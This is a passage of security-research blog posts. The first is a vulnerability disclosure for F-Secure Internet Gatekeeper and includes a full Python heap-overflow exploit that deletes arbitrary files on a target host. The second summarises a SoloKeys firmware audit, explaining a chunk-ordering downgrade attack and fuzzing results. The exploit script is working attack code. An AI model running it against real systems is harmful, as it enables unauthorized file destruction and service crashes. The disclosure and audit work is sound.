Malloc’s chunks of size 0x10 with an overflow of arbitrary data to override existing memory structures/strong. The following proof of concept demonstrates that. Despite being very raw, it exploits an existing struct on the heap by flipping a flag to code class=language-plaintext highlighter-rougeshould_delete_file = true/code, and then subsequently spraying the heap with the full path of the file we want to delete. Internet Gatekeeper internal handler has a code class=language-plaintext highlighter-rougedecontruct_http/code method which looks for this flag and removes the file. By leveraging this exploit, an attacker gains arbitrary file removal which is sufficient to demonstrate the severity of the issue./p div class=language-python highlighter-rougediv class=highlightpre class=highlightcodespan class=knfrom/span span class=nnpwn/span span class=knimport/span span class=o*/span span class=knimport/span span class=nntime/span span class=knimport/span span class=nnsys/span span class=kdef/span span class=nfsend_payload/spanspan class=p(/spanspan class=npayload/spanspan class=p,/span span class=ncontent_len/spanspan class=o=/spanspan class=mi21487483844/spanspan class=p,/span span class=nnofun/spanspan class=o=/spanspan class=bpFalse/spanspan class=p):/span span class=nr/span span class=o=/span span class=nremote/spanspan class=p(/spanspan class=nsys/spanspan class=p./spanspan class=nargv/spanspan class=p[/spanspan class=mi1/spanspan class=p],/span span class=mi9012/spanspan class=p)/span span class=nr/spanspan class=p./spanspan class=nsend/spanspan class=p(/spanspan class=sPOST / HTTP/1.1/spanspan class=se\n/spanspan class=s/spanspan class=p)/span span class=nr/spanspan class=p./spanspan class=nsend/spanspan class=p(/spanspan class=sHost: 192.168.0.122:9012/spanspan class=se\n/spanspan class=s/spanspan class=p)/span span class=nr/spanspan class=p./spanspan class=nsend/spanspan class=p(/spanspan class=sContent-Length: {}/spanspan class=se\n/spanspan class=s/spanspan class=p./spanspan class=nbformat/spanspan class=p(/spanspan class=ncontent_len/spanspan class=p))/span span class=nr/spanspan class=p./spanspan class=nsend/spanspan class=p(/spanspan class=s/spanspan class=se\n/spanspan class=s/spanspan class=p)/span span class=nr/spanspan class=p./spanspan class=nsend/spanspan class=p(/spanspan class=npayload/spanspan class=p)/span span class=kif/span span class=ownot/span span class=nnofun/spanspan class=p:/span span class=nr/spanspan class=p./spanspan class=nsend/spanspan class=p(/spanspan class=s/spanspan class=se\n\n/spanspan class=s/spanspan class=p)/span span class=kreturn/span span class=nr/span span class=kdef/span span class=nftrigger_exploit/spanspan class=p():/span span class=kprint/span span class=sTriggering exploit/span span class=npayload/span span class=o=/span span class=s/span span class=npayload/span span class=o+=/span span class=sA/span span class=o*/span span class=mi12/span span class=c1# Padding /span span class=npayload/span span class=o+=/span span class=np32/spanspan class=p(/spanspan class=mh0x1d/spanspan class=p)/span span class=c1# Fast bin chunk overwrite /span span class=npayload/span span class=o+=/span span class=sA/spanspan class=o*/span span class=mi488/span span class=c1# Padding /span span class=npayload/span span class=o+=/span span class=np32/spanspan class=p(/spanspan class=mh0xdda00771/spanspan class=p)/span span class=c1# Address of payload /span span class=npayload/span span class=o+=/span span class=np32/spanspan class=p(/spanspan class=mh0xdda00771/spanspan class=o+/spanspan class=mi4/spanspan class=p)/span span class=c1# Junk /span span class=nr/span span class=o=/span span class=nsend_payload/spanspan class=p(/spanspan class=npayload/spanspan class=p)/span span class=kdef/span span class=nfmassage_heap/spanspan class=p(/spanspan class=nfilename/spanspan class=p):/span span class=kprint/span span class=sTrying to massage the heap...../span span class=kfor/span span class=nx/span span class=owin/span span class=nbxrange/spanspan class=p(/spanspan class=mi100/spanspan class=p):/span span class=npayload/span span class=o=/span span class=s/span span class=npayload/span span class=o+=/span span class=np32/spanspan class=p(/spanspan class=mh0x0/spanspan class=p)/span span class=c1# Needed to bypass checks /span span class=npayload/span span class=o+=/span span class=np32/spanspan class=p(/spanspan class=mh0x0/spanspan class=p)/span span class=c1# Needed to bypass checks /span span class=npayload/span span class=o+=/span span class=np32/spanspan class=p(/spanspan class=mh0xdda0077d/spanspan class=p)/span span class=c1# Points to where the filename will be in memory /span span class=npayload/span span class=o+=/span span class=nfilename/span span class=o+/span span class=s/spanspan class=se\x00/spanspan class=s/span span class=npayload/span span class=o+=/span span class=sC/spanspan class=o*/spanspan class=p(/spanspan class=mh0x300/spanspan class=o-/spanspan class=nblen/spanspan class=p(/spanspan class=npayload/spanspan class=p))/span span class=nr/span span class=o=/span span class=nsend_payload/spanspan class=p(/spanspan class=npayload/spanspan class=p,/span span class=ncontent_len/spanspan class=o=/spanspan class=mh0x80000/spanspan class=p,/span span class=nnofun/spanspan class=o=/spanspan class=bpTrue/spanspan class=p)/span span class=nr/spanspan class=p./spanspan class=nclose/spanspan class=p()/span span class=ncut_conn/span span class=o=/span span class=bpTrue/span span class=kprint/span span class=sHeap massage done/span span class=kif/span span class=n__name__/span span class=o==/span span class=s__main__/spanspan class=p:/span span class=kif/span span class=nblen/spanspan class=p(/spanspan class=nsys/spanspan class=p./spanspan class=nargv/spanspan class=p)/span span class=o!=/span span class=mi3/spanspan class=p:/span span class=kprint/span span class=sUsage: ./{} lt;victim_ipgt; lt;file_to_removegt;/spanspan class=p./spanspan class=nbformat/spanspan class=p(/spanspan class=nsys/spanspan class=p./spanspan class=nargv/spanspan class=p[/spanspan class=mi0/spanspan class=p])/span span class=kprint/span span class=sRun `export PWNLIB_SILENT=1` for disabling verbose connections/span span class=nbexit/spanspan class=p()/span span class=nmassage_heap/spanspan class=p(/spanspan class=nsys/spanspan class=p./spanspan class=nargv/spanspan class=p[/spanspan class=mi2/spanspan class=p])/span span class=ntime/spanspan class=p./spanspan class=nsleep/spanspan class=p(/spanspan class=mi1/spanspan class=p)/span span class=ntrigger_exploit/spanspan class=p()/span span class=kprint/span span class=sExploit finished. {} is now removed and remote process should be crashed/spanspan class=p./spanspan class=nbformat/spanspan class=p(/spanspan class=nsys/spanspan class=p./spanspan class=nargv/spanspan class=p[/spanspan class=mi2/spanspan class=p])/span /code/pre/div/div pCurrent exploit reliability is around 60-70% of the total attempts, and our exploit PoC relies on the specific machine as listed in the prerequisites./p pGaining RCE should definitely be possible as we can control the exact chunk size and overwrite as much data as we’d like on small chunks. Furthermore, the application uses multiple threads which can be leveraged to get into clean heap arenas and attempt exploitation multiple times. If you’re interested in working with us, email your RCE PoC to a [email protected]@doyensec.com/a ;)/p pThis critical issue was tracked as a href=https://www.f-secure.com/en/business/support-and-downloads/security-advisories/fsc-2019-3FSC-2019-3/a and fixed in F-Secure Internet Gatekeeper versions 5.40 – 5.50 hotfix 8 (2019-07-11). We would like to thank a href=https://www.f-secure.com/F-Secure/a for their cooperation./p h2 id=resources-for-learning-about-heap-exploitationResources for learning about heap exploitation/h2 h4 id=exploit-walkthroughsExploit walkthroughs/h4 ul lia href=https://sensepost.com/blog/2018/linux-heap-exploitation-intro-series-set-you-free-part-1/Linux Heap Exploitation Intro Series: Set you free() – part 1/a/li lia href=https://sensepost.com/blog/2018/linux-heap-exploitation-intro-series-set-you-free-part-2/Linux Heap Exploitation Intro Series: Set you free() – part 2/a/li /ul h4 id=glibc-walkthroughsGLibC walkthroughs/h4 ul lia href=https://www.youtube.com/watch?v=z33CYcMf2ugGLibC Malloc for Exploiters - YouTube/a/li lia href=https://azeria-labs.com/heap-exploitation-part-1-understanding-the-glibc-heap-implementation/Understanding the GLibC Implementation - Part 1/a/li lia href=https://azeria-labs.com/heap-exploitation-part-2-glibc-heap-free-bins/Understanding the GLibC Implementation - Part 2/a/li /ul h4 id=toolsTools/h4 ul lia href=https://github.com/hugsy/gefGEF/a - Add-on for GDB to assist exploitation. Also, it has some useful commands for heap exploits debugging/li lia href=https://github.com/wapiflapi/villocVilloc/a - Visual representation of the heap in HTML/li /ul

Security Analysis of the Solo Firmware

18 February 2020 at 23:00
blockquote pThis blogpost summarizes the result of a cooperation between a href=https://solokeys.com/SoloKeys/a and Doyensec, and was originally a href=https://solokeys.com/blogs/news/security-analysis-of-the-solo-firmware-by-doyensecpublished on SoloKeys blog/a by Emanuele Cesena. You can download the full security auditing report a href=https://doyensec.com/resources/Doyensec_SoloKeys_TestingReport_Q12020_v3.pdfhere/a./p /blockquote div style=text-align: center; img src=../../../public/images/solo_downgrade_attack_code.png width=100% title=SoloKeys firmware snippet alt=SoloKeys firmware snippet align=center style=display: block; margin-left: auto; margin-right: auto; / /div pWe engaged Doyensec to perform a security assessment of a href=https://github.com/solokeys/solo/our firmware/a, v3.0.1 at the time of testing. During a 10 person/days project, Doyensec discovered and reported 3 vulnerabilities in our firmware. While two of the issues are considered informational, one issue has been rated as high severity and a href=https://github.com/solokeys/solo/pull/368fixed in v3.1.0/a. The a href=https://doyensec.com/resources/Doyensec_SoloKeys_TestingReport_Q12020_v3.pdffull report/a is available with all details, while in this post we’d like to give a high level summary of the engagement and findings./p h2 id=why-a-security-analysis-why-nowWhy a Security Analysis, Why Now?/h2 pOne of the first requests we received after Solo’s Kickstarter was to run an a href=https://github.com/solokeys/solo/issues/126independent security audit/a. At the time we didn’t have resources to run it and towards the end of 2019 I even closed the ticket as won’t fix, causing a series of complaints from the community./p pRecently, we shared that a href=https://solokeys.com/blogs/news/update-on-our-new-and-upcoming-security-keyswe’re building a new model of Solo/a based on a new microcontroller, the NXP LPC55S69, and a new firmware rewritten in Rust (a blog post on the firmware is coming soon). As most of our energies will be spent on the new firmware, we didn’t want the current STM32-based firmware to be abandoned. We’ll keep supporting it, fixing bugs and vulnerabilities, but it’s likely it will receive less attention from the wider community./p pTherefore we thought this was a good time for a security analysis./p pWe asked Doyensec to detail not just their findings but also their process, so that we can re-validate the new firmware in Rust when released. We expect to run another analysis on the new firmware, although there’s no concrete plan yet./p h2 id=the-major-finding-downgrade-attackThe Major Finding: Downgrade Attack/h2 pThe security review consisted of a manual source code review and fuzzing of the firmware. One researcher performed the review for 2 weeks from Jan 21 to Jan 31, 2020./p pIn short, he found a downgrade attack where he was able to “upgrade” a firmware to a previous version, exploiting the ability to upload the firmware in multiple, unordered chunks. Downgrade attacks are generally very sensitive because they allow an attacker to downgrade to a previous version of the firmware and then take advantage of older known vulnerabilities./p pPractically speaking, however, running such an attack against a Solo key requires either physical access to the key or -if attempted on a malicious site- an explicit user acknowledgement on the WebAuthn window./p pstrongThis means that your key is almost certainly safe. In addition, we always recommend upgrading the firmware with our official tools./strong/p pAlso note that our firmware is digitally signed and this downgrade attack couldn’t bypass our signature verification. Therefore a possible attacker can only install one of our twenty-ish previous releases./p pNeedless to say, we took the vulnerability very seriously and fixed it immediately./p h2 id=anatomy-of-the-downgrade-attackAnatomy of the Downgrade Attack/h2 pThis was the a href=https://github.com/solokeys/solo/blob/3.0.1/targets/stm32l432/bootloader/bootloader.c#L201incriminated code/a. And this is a href=https://github.com/solokeys/solo/pull/368/files#diff-f7cab51b94eff98a0aff021c872244b4R203the patch/a, that should help understand what happened./p pSolo firmware updates are a binary blob where the last 4 bytes represent the version. When a new firmware is installed on the keys, these bytes are checked to ensure that its version is greater than the currently installed one. The firmware digital signature is also verified, but this is irrelevant as this attack only allows to install older signed releases./p pThe new firmware is written to the keys in chunks. At every write, a pointer to the last written address is updated, so that eventually it will point to the new version at the end of the firmware. You might see the issue: we were assuming that chunks are written only once and in order, but this was not enforced. The patch fixes the issue by requiring that the chunks are written strictly in ascending order./p pAs an example, think of running v3.0.1, and take an old firmware - say v3.0.0. Search four bytes in it which, when interpreted as a version number, appear to be greater than v3.0.1. First, send the whole 3.0.0 firmware to the key. The last_written_app_address pointer now correctly points to the end of the firmware, encoding version 3.0.0./p pimg src=/public/images/solo_firmware_downgrade_step1.png alt=Firmware downgrade step 1 / Then, write again the four chosen bytes at their original location. Now last_written_app_address points somewhere in the middle of the firmware, and those 4 bytes are interpreted as a “random” version. It turns out firmware v3.0.0 contains some bytes which can be interpreted as v3.0.37 – boom! a href=https://github.com/doyensec/SoloKeys-2020Q1-fw-downgrade-PoCHere is a fully working proof-of-concept/a./p pimg src=/public/images/solo_firmware_downgrade_step2.png alt=Firmware downgrade step 1 //p h2 id=fuzzing-tinycbor-with-aflFuzzing TinyCBOR with AFL/h2 pThe researcher also integrated AFL (American Fuzzy Lop) and started fuzzing our firmware. Our firmware depends on an external library, tinycbor, for parsing CBOR data. In about 24 hours of execution, the researcher exercised the code with over 100M inputs and found over 4k bogus inputs that are misinterpreted by tinycbor and cause a crash of our firmware. Interestingly, the initial inputs were generated by our FIDO2 testing framework./p pThe fuzzer will be integrated in our testing toolchain soon. If anyone in the community is interested in fuzzing and would like to contribute by fixing bugs in tinycbor we would be happy to share details and examples./p h2 id=summarySummary/h2 pIn summary, we engaged a security engineering company (Doyensec) to perform a security review of our firmware. You can read the full report for details on the process and the downgrade attack they found. For any additional question or for helping with fuzzing of tinycbor feel free to reach out on Twitter a href=https://twitter.com/[email protected]/a or at a href=mailto:[email protected]@solokeys.com/a./p pWe would like to thank Doyensec for their help in securing the SoloKeys platform. Please make sure to a href=https://doyensec.comcheck their website/a, and oh, they’re also launching a game soon. Yes, a a href=https://www.h1jack.commobile game with a hacking theme/a!/p
❌